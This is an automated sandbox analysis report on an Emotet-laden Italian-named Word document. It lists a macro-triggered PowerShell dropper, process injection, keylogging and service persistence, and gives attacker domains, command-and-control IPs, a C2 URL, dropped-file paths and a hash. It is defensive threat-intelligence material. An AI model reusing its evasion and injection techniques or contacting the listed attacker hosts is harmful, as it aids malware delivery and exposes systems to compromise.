Loading ...

Play interactive tourEdit tour

Analysis Report Nuovo_documento_2019.09.20.doc

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:961422
Start date:20.09.2019
Start time:13:28:47
Joe Sandbox Product:Cloud
Overall analysis duration:0h 9m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Nuovo_documento_2019.09.20.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.evad.winDOC@18/52@1/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 90.5% (good quality ratio 87.9%)
  • Quality average: 82.2%
  • Quality standard deviation: 25.6%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 133
  • Number of non-executed functions: 301
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Windows Management Instrumentation1Valid Accounts1Valid Accounts1Software Packing2Input Capture11System Time Discovery1Remote File Copy2Input Capture11Data Encrypted12Uncommonly Used Port1
Replication Through Removable MediaPowerShell2Modify Existing Service11Access Token Manipulation1Disabling Security Tools1Network SniffingSecurity Software Discovery13Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy2
Drive-by CompromiseScripting12New Service12Process Injection3Deobfuscate/Decode Files or Information11Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22
Exploit Public-Facing ApplicationExecution through API1System FirmwareNew Service12Scripting12Credentials in FilesFile and Directory Discovery11Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol2
Spearphishing LinkExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationSystem Information Discovery45Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol2
Spearphishing AttachmentCommand-Line Interface11Modify Existing ServiceNew ServiceMasquerading2Brute ForceQuery Registry1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceService Execution2Path InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port
Supply Chain CompromiseThird-party SoftwareLogon ScriptsProcess InjectionAccess Token Manipulation1Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer Protocol
Trusted RelationshipRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection3Input PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer Encryption

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for sampleShow sources
Source: Nuovo_documento_2019.09.20.docJoe Sandbox ML: detected
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\982.exeVirustotal: Detection: 15%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Nuovo_documento_2019.09.20.docVirustotal: Detection: 22%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,7_2_0040207B
Source: C:\Users\user\982.exeCode function: 7_2_00401F56 CryptGetHashParam,7_2_00401F56
Source: C:\Users\user\982.exeCode function: 7_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,7_2_0040215A
Source: C:\Users\user\982.exeCode function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,7_2_00401F75
Source: C:\Users\user\982.exeCode function: 7_2_00401F11 CryptExportKey,7_2_00401F11
Source: C:\Users\user\982.exeCode function: 7_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,12_2_00401F75
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00401FFC
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,12_2_0040207B
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F56 CryptGetHashParam,12_2_00401F56
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,12_2_0040215A
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F11 CryptExportKey,12_2_00401F11
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00401F75 CryptDecodeObjectEx,LocalFree,12_1_00401F75

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: sabiosdelamor.co
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49164 -> 149.167.86.174:990
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 149.167.86.174 149.167.86.174
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 149.167.86.174
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Source: unknownTCP traffic detected without corresponding DNS query: 181.164.8.25
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401383 InternetReadFile,12_2_00401383
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: sabiosdelamor.co
Urls found in memory or binary dataShow sources
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmpString found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/
Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmpString found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/n
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00403930 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,4_2_00403930

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F5047_2_0040F504
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040F50412_2_0040F504

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\982.exeCode function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,7_2_00401F75
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,12_2_00401F75

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Document image extraction number: 0Screenshot OCR: Enable Editing and Enable Content. Type: Microsoft Word Document
Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)Show sources
Source: Nuovo_documento_2019.09.20.docOLE, VBA macro line: If RecentFiles.Count > 3 Then
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\982.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Users\user\982.exeCode function: 4_2_00522670 NtResumeThread,4_2_00522670
Source: C:\Users\user\982.exeCode function: 4_2_00522630 NtWriteVirtualMemory,4_2_00522630
Source: C:\Users\user\982.exeCode function: 4_2_005226D0 NtMapViewOfSection,4_2_005226D0
Source: C:\Users\user\982.exeCode function: 4_2_005226B0 NtCreateSection,4_2_005226B0
Source: C:\Users\user\982.exeCode function: 6_2_00492670 NtResumeThread,6_2_00492670
Source: C:\Users\user\982.exeCode function: 6_2_00492630 NtWriteVirtualMemory,6_2_00492630
Source: C:\Users\user\982.exeCode function: 6_2_004926D0 NtMapViewOfSection,6_2_004926D0
Source: C:\Users\user\982.exeCode function: 6_2_004926B0 NtCreateSection,6_2_004926B0
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2670 NtResumeThread,9_2_005A2670
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A2630 NtWriteVirtualMemory,9_2_005A2630
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A26D0 NtMapViewOfSection,9_2_005A26D0
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A26B0 NtCreateSection,9_2_005A26B0
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2670 NtResumeThread,11_2_005B2670
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B2630 NtWriteVirtualMemory,11_2_005B2630
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B26D0 NtMapViewOfSection,11_2_005B26D0
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B26B0 NtCreateSection,11_2_005B26B0
Contains functionality to delete servicesShow sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F6D0 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,7_2_0040F6D0
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\982.exeCode function: 7_2_00401D2B CreateProcessAsUserW,CreateProcessW,7_2_00401D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.datJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\sortedwatched.exeMutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Users\user\982.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\982.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
Source: C:\Windows\System32\sortedwatched.exeMutant created: \BaseNamedObjects\Global\M3C4E0000
Detected potential crypto functionShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0042A1274_2_0042A127
Source: C:\Users\user\982.exeCode function: 4_2_0041032F4_2_0041032F
Source: C:\Users\user\982.exeCode function: 4_2_004294724_2_00429472
Source: C:\Users\user\982.exeCode function: 4_2_0042A5474_2_0042A547
Source: C:\Users\user\982.exeCode function: 4_2_004355314_2_00435531
Source: C:\Users\user\982.exeCode function: 4_2_004376A14_2_004376A1
Source: C:\Users\user\982.exeCode function: 4_2_004366B14_2_004366B1
Source: C:\Users\user\982.exeCode function: 4_2_004299474_2_00429947
Source: C:\Users\user\982.exeCode function: 4_2_00435A754_2_00435A75
Source: C:\Users\user\982.exeCode function: 4_2_00412AE34_2_00412AE3
Source: C:\Users\user\982.exeCode function: 4_2_00429D1B4_2_00429D1B
Source: C:\Users\user\982.exeCode function: 4_2_0042EFFF4_2_0042EFFF
Source: C:\Users\user\982.exeCode function: 4_2_00435FB94_2_00435FB9
Source: C:\Users\user\982.exeCode function: 4_2_002C50E84_2_002C50E8
Source: C:\Users\user\982.exeCode function: 4_2_002C50E44_2_002C50E4
Source: C:\Users\user\982.exeCode function: 4_2_002C22AF4_2_002C22AF
Source: C:\Users\user\982.exeCode function: 4_2_002C48C14_2_002C48C1
Source: C:\Users\user\982.exeCode function: 4_2_005229704_2_00522970
Source: C:\Users\user\982.exeCode function: 5_2_00404AD45_2_00404AD4
Source: C:\Users\user\982.exeCode function: 5_2_0040436D5_2_0040436D
Source: C:\Users\user\982.exeCode function: 5_2_00402F825_2_00402F82
Source: C:\Users\user\982.exeCode function: 5_2_004037A95_2_004037A9
Source: C:\Users\user\982.exeCode function: 6_2_003E22AF6_2_003E22AF
Source: C:\Users\user\982.exeCode function: 6_2_003E50E86_2_003E50E8
Source: C:\Users\user\982.exeCode function: 6_2_003E50E46_2_003E50E4
Source: C:\Users\user\982.exeCode function: 6_2_003E48C16_2_003E48C1
Source: C:\Users\user\982.exeCode function: 6_2_004929706_2_00492970
Source: C:\Users\user\982.exeCode function: 7_2_00404AD47_2_00404AD4
Source: C:\Users\user\982.exeCode function: 7_2_0040436D7_2_0040436D
Source: C:\Users\user\982.exeCode function: 7_2_00402F827_2_00402F82
Source: C:\Users\user\982.exeCode function: 7_2_004037A97_2_004037A9
Source: C:\Users\user\982.exeCode function: 7_1_00404AD47_1_00404AD4
Source: C:\Users\user\982.exeCode function: 7_1_0040436D7_1_0040436D
Source: C:\Users\user\982.exeCode function: 7_1_00402F827_1_00402F82
Source: C:\Users\user\982.exeCode function: 7_1_004037A97_1_004037A9
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E22AF9_2_003E22AF
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E50E89_2_003E50E8
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E50E49_2_003E50E4
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_003E48C19_2_003E48C1
Source: C:\Windows\System32\sortedwatched.exeCode function: 9_2_005A29709_2_005A2970
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F48C111_2_004F48C1
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F50E811_2_004F50E8
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F50E411_2_004F50E4
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_004F22AF11_2_004F22AF
Source: C:\Windows\System32\sortedwatched.exeCode function: 11_2_005B297011_2_005B2970
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00404AD412_2_00404AD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_0040436D12_2_0040436D
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_00402F8212_2_00402F82
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_2_004037A912_2_004037A9
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00404AD412_1_00404AD4
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_0040436D12_1_0040436D
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_00402F8212_1_00402F82
Source: C:\Windows\System32\sortedwatched.exeCode function: 12_1_004037A912_1_004037A9
Document contains an ObjectPool stream indicating possible embedded files or OLE objectsShow sources
Source: Nuovo_documento_2019.09.20.docOLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: Nuovo_documento_2019.09.20.docOLE, VBA macro line: Sub autoopen()
Source: VBA code instrumentationOLE, VBA macro: Module JIodCjfv, Function autoopenName: autoopen
Document contains embedded VBA macrosShow sources
Source: Nuovo_documento_2019.09.20.docOLE indicator, VBA macros: true
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\982.exe 8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\982.exeCode function: String function: 0042922B appears 129 times
Source: C:\Users\user\982.exeCode function: String function: 00429338 appears 52 times
PE file contains strange resourcesShow sources
Source: 982.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 982.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\sortedwatched.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\sortedwatched.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Yara signature matchShow sources
Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, type: MEMORYMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.sortedwatched.exe.5b3000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.982.exe.523000.2.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.982.exe.493000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.sortedwatched.exe.5a3000.2.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.1.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 10.1.sortedwatched.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.sortedwatched.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.982.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.evad.winDOC@18/52@1/3
Contains functionality to create servicesShow sources
Source: C:\Users\user\982.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0
Source: C:\Users\user\982.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,7_1_0040F7A0
Source: C:\Windows\System32\sortedwatched.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,12_2_0040F7A0
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\982.exeCode function: 5_2_00401943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00401943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\982.exeCode function: 4_2_0041286F __EH_prolog3_GS,_memset,GetVersionExW,_malloc,_memset,_DebugHeapAllocator,_wcschr,CoInitializeEx,CoCreateInstance,4_2_0041286F
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\982.exeCode function: 4_2_004190A2 LoadResource,LockResource,_malloc,GetSysColor,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,FreeResource,4_2_004190A2
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\982.exeCode function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ovo_documento_2019.09.20.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR81DD.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: Nuovo_documento_2019.09.20.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
